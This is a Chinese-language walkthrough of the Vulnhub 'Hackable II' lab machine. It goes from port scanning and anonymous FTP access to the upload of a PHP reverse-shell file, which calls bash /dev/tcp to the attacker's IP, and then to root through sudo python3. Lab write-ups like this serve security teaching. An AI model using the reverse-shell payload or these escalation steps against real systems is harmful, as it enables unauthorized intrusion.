【渗透测试】Vulnhub Hackable II

admin 2024年8月20日21:16:15【渗透测试】Vulnhub Hackable II已关闭评论27 views字数 1265阅读4分13秒阅读模式

渗透环境

攻击机:   IP: 192.168.216.129(Kali)
靶机:     IP:192.168.216.131
靶机下载地址:https://www.vulnhub.com/entry/hackable-ii,711/

进行渗透

一、 获取端口信息

该虚拟机导入VMware需要在拯救模式中重新配置一下网卡名称,附上教程,不再赘述:https://blog.csdn.net/liver100day/article/details/119109320

进行端口扫描

nmap -O -sV -p- -A 192.168.216.131

【渗透测试】Vulnhub Hackable II

扫描WEB目录

【渗透测试】Vulnhub Hackable II

【渗透测试】Vulnhub Hackable II

打开CALL.html,没有什么发现

【渗透测试】Vulnhub Hackable II

尝试使用nmap扫描FTP服务,看是否允许匿名登录

nmap --script ftp-anon 192.168.216.131

【渗透测试】Vulnhub Hackable II

扫描结果表明该主机的FTP服务允许匿名登录,且匿名用户能够访问至少一个文件(CALL.html

登录FTP服务,用户名为anonymous,密码不用输入(直接敲回车)

【渗透测试】Vulnhub Hackable II

二、 寻找WEB漏洞

查看文件,并下载CALL.html

dir
get CALL.html

【渗透测试】Vulnhub Hackable II

下载后浏览CALL.html源码并未发现有用信息
尝试上传文件,在攻击机当前路径下写文件test.php,内容如下:

<?=phpinfo();?>

通过FTP上传到目标机器

put test.php

【渗透测试】Vulnhub Hackable II

上传成功,且在/files/下可以看到该文件,访问该文件,发现可以成功解析

【渗透测试】Vulnhub Hackable II

接下来的思路就比较清晰了,写一个PHP文件,触发时让目标机器反向连接我们的攻击机来反弹shell。
trojan.php,内容如下:

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.216.129/4444 0>&1'");?>

将其上传

put trojan.php

攻击机启动监听

nc -nlvp 4444

浏览器访问trojan.php,触发木马进行反向连接

【渗透测试】Vulnhub Hackable II

成功反弹shell

三、 提权

接下来进入/home目录,可以看到一个shrek用户,另外还有一个important.txt

【渗透测试】Vulnhub Hackable II

读取important.txt

【渗透测试】Vulnhub Hackable II

提示我们运行/.runme.sh

【渗透测试】Vulnhub Hackable II

后面的字符串显然是经过md5运算的,我们使用在线md5破解网站进行解码,得到密码:onion

【渗透测试】Vulnhub Hackable II

创建交互式shell,切换到用户shrek

python3 -c 'import pty;pty.spawn("/bin/bash")'
su shrek

【渗透测试】Vulnhub Hackable II

常规思路,查看一下具有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null

没有什么发现

【渗透测试】Vulnhub Hackable II

查看shrek用户可执行的特权命令

sudo -l

【渗透测试】Vulnhub Hackable II

写一个py文件root.py,内容如下:

echo 'import pty;pty.spawn("/bin/bash")' > root.py

该文件的作用就是打开一个交互式的shell

【渗透测试】Vulnhub Hackable II

接下来执行

sudo /usr/bin/python3.5 /home/shrek/root.py

这里建议都使用绝对路径,相对路径有时无法成功执行。

这样就用root的身份登录了shell,渗透结束。

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月20日21:16:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透测试】Vulnhub Hackable IIhttps://cn-sec.com/archives/3082575.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.